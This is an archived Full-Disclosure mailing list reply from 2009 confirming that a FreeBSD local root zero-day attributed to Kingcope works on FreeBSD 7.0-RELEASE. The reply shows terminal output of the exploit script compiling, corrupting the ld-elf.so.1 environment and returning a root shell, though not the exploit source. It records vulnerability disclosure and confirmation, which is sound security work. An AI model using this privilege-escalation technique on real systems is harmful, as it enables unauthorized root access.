| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <F0B0F3DA-CBBA-4142-82BE-10BF355DDB73@gmail.com> Date: Mon, 30 Nov 2009 21:45:38 -0800 From: bk <chort0@...il.com> To: David Berard <contact@...idberard.fr>, full-disclosure@...ts.grok.org.uk Subject: Re: ** FreeBSD local r00t zeroday On Nov 30, 2009, at 9:25 PM, David Berard wrote: >> 7.0 not vuln. > > 7.0 vulnerable here, > > $ ./env > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > ALEX-ALEX > # uname -r > 7.0-RELEASE-p3 Here as well: bin/Kingcope.sh: new file: 35 lines, 772 characters. [chort@...on ~]$ chmod +x bin/Kingcope.sh [chort@...on ~]$ Kingcope.sh bin ktrace.out scratch vent_stalk FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # whoami root # uname -a FreeBSD demon.smtps.net 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@...an.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 It's a VM if that matters. -- chort _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists